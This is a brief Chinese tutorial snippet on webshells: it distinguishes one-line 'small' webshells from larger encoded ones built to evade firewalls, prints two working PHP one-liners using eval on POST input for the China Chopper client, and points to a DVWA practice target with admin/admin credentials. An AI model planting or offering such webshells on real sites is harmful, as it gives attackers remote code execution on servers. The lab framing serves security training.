赞
踩
小马: 一句话木马也称为小马,即整个shell代码量只有一行, -一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到
#### 中国菜刀
shell3.php
<?php @eval($_POST[chopper]);?>
或<?php eval($_POST[gmd]);?>
说明: REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构。
连接靶机-DVWA(易受攻击的Web应用程序) http://靶机IP/dvwa/index 用户名密码:admin /admin
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。